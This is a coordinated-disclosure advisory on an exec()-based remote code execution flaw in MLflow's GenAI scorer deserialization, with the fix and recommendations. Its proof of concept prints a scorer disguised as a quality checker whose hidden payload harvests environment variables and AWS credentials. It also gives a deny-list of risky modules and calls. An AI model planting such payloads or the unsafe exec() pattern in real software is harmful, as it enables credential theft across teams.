Remote Code Execution via GenAI Scorer Deserialization in MLflow

Author: Evan Harris
Risk: High
Affected Component: MLflow GenAI scorers (mlflow/mlflow)

TL;DR

MLflow’s GenAI scorer deserialization mechanism contained a remote code execution vulnerability. The recreate_function() utility in scorer_utils.py passed attacker-controlled scorer data (stored in the MLflow tracking database) directly to Python’s exec(). A malicious scorer registered by one user could execute arbitrary code on the machine of anyone who later retrieved and ran it, enabling a supply chain attack across an entire ML team. We reported the issue to the MLflow maintainers, who fixed it by restricting custom scorer registration and loading to Databricks-controlled environments. Users should upgrade to MLflow 3.5.2 or later.

Background

MLflow’s GenAI module lets teams define scorers, Python functions that evaluate the quality of LLM outputs (length checks, content safety, formatting, and so on). Scorers can be authored with the @scorer decorator, registered against an experiment, and later retrieved by name with get_scorer() so that colleagues can reuse a shared evaluation.

To make this work, MLflow serializes the scorer’s underlying function and stores it in the tracking database. When the scorer is retrieved, MLflow reconstructs the function from that stored data. The reconstruction step is where the vulnerability lived: the serialized source was reconstituted by calling Python’s exec(), which runs whatever code it is given. Because the stored data is fully attacker-controlled, anyone who could register a scorer could plant code that would execute inside another user’s process.
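The pattern can be illustrated with a minimal sketch. This is not MLflow’s actual implementation: recreate_function_sketch, the stored dictionary layout, and the SCORER_SKETCH_MARKER environment variable are all hypothetical names chosen for illustration, and the "payload" is a harmless write to the current process environment.

```python
import os
import textwrap


def recreate_function_sketch(name, signature, body_source):
    """Rebuild a function from stored strings by exec()-ing them (unsafe pattern)."""
    body = textwrap.indent(textwrap.dedent(body_source), "    ")
    source = f"def {name}{signature}:\n{body}"
    namespace = {}
    # exec() compiles and runs whatever the stored strings contain.
    exec(source, namespace)
    return namespace[name]


# Stand-in for data read back from a tracking store (hypothetical layout).
stored = {
    "name": "quality_checker",
    "signature": "(outputs)",
    "body": (
        "import os\n"
        "os.environ['SCORER_SKETCH_MARKER'] = 'payload ran'\n"  # benign stand-in payload
        "return len(outputs) > 10\n"
    ),
}

fn = recreate_function_sketch(stored["name"], stored["signature"], stored["body"])
result = fn("This is test output to evaluate")
print(result, os.environ.get("SCORER_SKETCH_MARKER"))
```

Nothing in the sketch distinguishes a legitimate scorer body from a hostile one: whoever controls the stored strings controls what runs in the caller’s process.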

Overview

The vulnerability is triggered along a single deserialization call chain that ends in exec():

%%{init: {'themeVariables': {'fontSize': '18px'}}}%%
flowchart TD
    A["Attacker authors malicious @scorer<br/>with payload hidden in the body"] --> B["Distributed via PyPI, GitHub,<br/>or shared Python module"]
    B --> C["Victim imports and registers<br/>the scorer with MLflow"]
    C --> D["Serialized function stored in<br/>tracking database"]
    D --> E["get_scorer(name, experiment_id)<br/>registry.py:571"]
    E --> F["Scorer.model_validate()<br/>base.py:222"]
    F --> G["_reconstruct_decorator_scorer()<br/>base.py:298"]
    G --> H["recreate_function()<br/>scorer_utils.py:131"]
    H --> I["exec(attacker_source)"]
    I --> J["Remote Code Execution<br/>in victim process"]

    style A fill:#ffebee
    style B fill:#ffebee
    style C fill:#fff3e0
    style D fill:#fff9c4
    style E fill:#fff9c4
    style F fill:#fff9c4
    style G fill:#fff9c4
    style H fill:#ffcdd2
    style I fill:#ffcdd2
    style J fill:#ffcdd2

The call chain, with each comment giving the file and line of the call site, is:

mlflow.genai.scorers.get_scorer()
  → Scorer.model_validate()        # registry.py:571
  → _reconstruct_decorator_scorer() # base.py:222
  → recreate_function()             # base.py:298
  → exec()                          # scorer_utils.py:131  ← REMOTE CODE EXECUTION

Attack Scenario

1. An attacker authors a scorer that looks legitimate (a “quality checker” with a believable docstring) but hides a malicious payload in the function body.
2. The attacker distributes the scorer through a channel the victim trusts: a PyPI package, a team GitHub repository, or a shared Python module.
3. A victim imports the scorer and registers it with MLflow. The serialized function is written to the tracking database.
4. Later, someone retrieves the scorer with get_scorer() and uses it. This may happen on a different machine, by a different team member, days or weeks after registration.
5. During deserialization, recreate_function() calls exec() on the stored source. The hidden payload runs with the full privileges of the victim’s process.

Because the trigger is separated from registration both in time and across users, the attack is silent: a single malicious scorer registered once can compromise everyone on the team who later pulls it.
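The decoupling between registration and execution can be modeled with a toy store. The sketch below is an assumption-laden illustration, not MLflow’s schema or API: the scorers table, register_scorer, load_scorer_unsafely, and the TOY_STORE_MARKER variable are hypothetical, and one in-memory SQLite connection stands in for two users sharing a tracking database.

```python
import os
import sqlite3


def register_scorer(conn, name, source):
    """Store scorer source as a plain string, as a registering user would."""
    conn.execute("INSERT INTO scorers (name, source) VALUES (?, ?)", (name, source))
    conn.commit()


def load_scorer_unsafely(conn, name):
    """Fetch the stored string and exec() it (the unsafe pattern)."""
    row = conn.execute(
        "SELECT source FROM scorers WHERE name = ?", (name,)
    ).fetchone()
    namespace = {}
    exec(row[0], namespace)
    return namespace[name]


os.environ.pop("TOY_STORE_MARKER", None)
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE scorers (name TEXT PRIMARY KEY, source TEXT)")

# Registration: the payload is only stored, so nothing runs yet.
register_scorer(
    conn,
    "quality_checker",
    "def quality_checker(outputs):\n"
    "    import os\n"
    "    os.environ['TOY_STORE_MARKER'] = 'payload ran'\n"  # benign stand-in payload
    "    return len(outputs) > 10\n",
)
marker_after_registration = os.environ.get("TOY_STORE_MARKER")

# Later retrieval and use: the stored code runs in the consumer's process.
retrieved = load_scorer_unsafely(conn, "quality_checker")
result = retrieved("This is test output to evaluate")
marker_after_use = os.environ.get("TOY_STORE_MARKER")
print(marker_after_registration, result, marker_after_use)
```

The consumer only ever supplies a name. The code that runs is whatever the registering user placed in the store.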

Proof of Concept

The malicious scorer below presents itself as an output quality checker. The body contains a payload that drops a marker file, then copies environment variables and AWS credentials into files under /tmp (standing in for exfiltration to an attacker-controlled host) before returning a plausible result to avoid suspicion:

from mlflow.genai.scorers import scorer

@scorer
def quality_checker(outputs):
    """
    Quality checker for LLM outputs.

    Validates that outputs meet quality standards:
    - Minimum length requirements
    - No offensive content
    - Proper formatting

    Returns:
        bool: True if output passes quality checks
    """
    # MALICIOUS PAYLOAD HIDDEN BELOW
    import os

    # Create proof file
    os.system('touch /tmp/rce_supply_chain.txt')
    os.system('echo "COMPROMISED VIA SUPPLY CHAIN" > /tmp/rce_supply_chain.txt')

    # Exfiltrate environment variables
    env_data = dict(os.environ)
    with open('/tmp/exfiltrated_env.txt', 'w') as f:
        f.write("EXFILTRATED ENVIRONMENT:\n")
        for key, value in list(env_data.items())[:10]:
            f.write(f'{key}={value}\n')

    # Harvest AWS credentials
    aws_creds_path = os.path.expanduser('~/.aws/credentials')
    if os.path.exists(aws_creds_path):
        with open(aws_creds_path, 'r') as f_in:
            with open('/tmp/aws_credentials_stolen.txt', 'w') as f_out:
                f_out.write(f_in.read())

    # Return a valid result to avoid suspicion
    return len(outputs) > 10

Once the scorer has been registered (here under the name quality_checker_v1), a victim retrieves the shared scorer as they normally would:

import mlflow
from mlflow.genai.scorers import get_scorer

# Different machine, different user, or days later
mlflow.set_tracking_uri("sqlite:///mlflow_tracking/mlflow.db")

scorer = get_scorer(name="quality_checker_v1", experiment_id="1")

And then uses it:

result = scorer(outputs="This is test output to evaluate")

At this point the RCE fires and the payload runs in the victim’s process.

Impact

Depending on the payload carried in the untrusted scorer data, an attacker can:

Execute arbitrary Python code with the full privileges of the victim’s process
Exfiltrate sensitive data such as credentials, environment variables, and source code
Harvest credentials from common locations (AWS, Docker, SSH)
Establish persistence on the victim’s machine
Perform lateral movement and network reconnaissance

The impact is amplified by the supply chain nature of the flaw: one malicious scorer registered by a single team member can compromise every user who later retrieves it, with the trigger occurring silently long after registration.

MLflow Response

After we disclosed the issue through MLflow’s coordinated disclosure process, the maintainers addressed it in pull request #18493.

Rather than attempting to sandbox or validate the deserialized source, the maintainers removed the dangerous capability outside of controlled environments: registering and loading custom code-based scorers is now restricted to Databricks tracking environments, where the set of users who can upload scorers is controlled. Users on other tracking backends are directed toward safer alternatives such as built-in scorers and make_judge()-based scorers, which do not require arbitrary code execution during deserialization.
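The shape of such a restriction can be sketched as a gate placed in front of the reconstruction step. This is an illustration of the idea only, not the code from pull request #18493: is_databricks_tracking_uri, load_custom_scorer, CustomScorerNotAllowedError, and the rebuild callback are hypothetical names, and the URI check assumes the "databricks" and "databricks://profile" tracking URI forms.

```python
from urllib.parse import urlparse


class CustomScorerNotAllowedError(Exception):
    """Raised when code-based scorers are requested outside an allowed backend."""


def is_databricks_tracking_uri(uri):
    """Hypothetical check for 'databricks' or 'databricks://<profile>' URIs."""
    return uri == "databricks" or urlparse(uri).scheme == "databricks"


def load_custom_scorer(tracking_uri, stored_source, rebuild):
    """Refuse to rebuild code-based scorers unless the backend is Databricks."""
    if not is_databricks_tracking_uri(tracking_uri):
        # Fail closed: the stored source is never passed to the rebuild step.
        raise CustomScorerNotAllowedError(
            "Custom code-based scorers are not supported for this tracking backend."
        )
    return rebuild(stored_source)


try:
    load_custom_scorer("sqlite:///mlflow_tracking/mlflow.db", "def f(): ...", print)
except CustomScorerNotAllowedError as err:
    print("refused:", err)
```

The design choice is to fail closed before any stored source is touched, rather than trying to decide whether a given piece of source is safe to execute.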

The fix shipped in MLflow 3.5.2.
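A quick way to check whether an environment already has the fixed release is to compare the installed version against 3.5.2. The helper below is a minimal sketch using only the standard library. The names release_tuple and includes_fix are illustrative, and the parsing is deliberately conservative: any suffixed build of 3.5.2 itself (such as a release candidate) is treated as not fixed.

```python
import re
from importlib.metadata import PackageNotFoundError, version

FIXED_VERSION = (3, 5, 2)


def release_tuple(version_string):
    """Return (major, minor, patch) and whether a suffix such as 'rc1' follows."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version_string)
    if match is None:
        raise ValueError(f"unrecognized version string: {version_string!r}")
    release = tuple(int(part or 0) for part in match.groups())
    has_suffix = match.end() != len(version_string)
    return release, has_suffix


def includes_fix(version_string):
    """True if the version is 3.5.2 or later, treating suffixed 3.5.2 builds as unfixed."""
    release, has_suffix = release_tuple(version_string)
    if release == FIXED_VERSION and has_suffix:
        return False
    return release >= FIXED_VERSION


try:
    installed = version("mlflow")
except PackageNotFoundError:
    installed = None

if installed is None:
    print("mlflow is not installed in this environment")
else:
    print(installed, "includes fix:", includes_fix(installed))
```

For strict PEP 440 comparison, a dedicated version-parsing library is a better fit than this regular expression.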

Recommendations

For End Users

Upgrade to MLflow 3.5.2 or later.
Only register and retrieve custom scorers from sources you fully trust.
Treat scorer data in a tracking database as untrusted code, not inert data. Anyone who can write to the tracking store can run code on every consumer.
Prefer built-in scorers or make_judge() scorers, which do not execute arbitrary code during deserialization.
Restrict write access to shared tracking databases and review scorers before reuse across a team.
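When reviewing a scorer before reuse, a static pass over its source can surface obvious red flags without executing anything. The sketch below is a triage heuristic under stated assumptions, not a sandbox or a defense: flag_suspicious and the two deny-lists are hypothetical, and a determined attacker can evade this kind of check through obfuscation or indirect attribute access.

```python
import ast

# Illustrative deny-lists; tune them to the environment being reviewed.
SUSPICIOUS_CALLS = {"exec", "eval", "compile", "__import__", "open"}
SUSPICIOUS_MODULES = {"os", "subprocess", "socket", "shutil", "ctypes", "urllib"}


def flag_suspicious(source):
    """Parse source without running it and list (line, description) findings."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings.append((node.lineno, f"import {alias.name}"))
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in SUSPICIOUS_MODULES:
                findings.append((node.lineno, f"from {node.module} import ..."))
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"call to {node.func.id}()"))
    return sorted(findings)


sample = (
    "def quality_checker(outputs):\n"
    "    import os\n"
    "    os.system('touch /tmp/marker')\n"
    "    return len(outputs) > 10\n"
)
for lineno, description in flag_suspicious(sample):
    print(f"line {lineno}: {description}")
```

A clean result from a check like this does not make a scorer safe. It only helps prioritize which scorers need a closer manual read.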

Timeline

Date	Event
October 20, 2025	Vulnerability reported to MLflow maintainers via coordinated disclosure (issue #18404)
October 24, 2025	MLflow merges fix (PR #18493), released in v3.5.2
January 8, 2026	huntr marked the issue as a duplicate
June 8, 2026	Public disclosure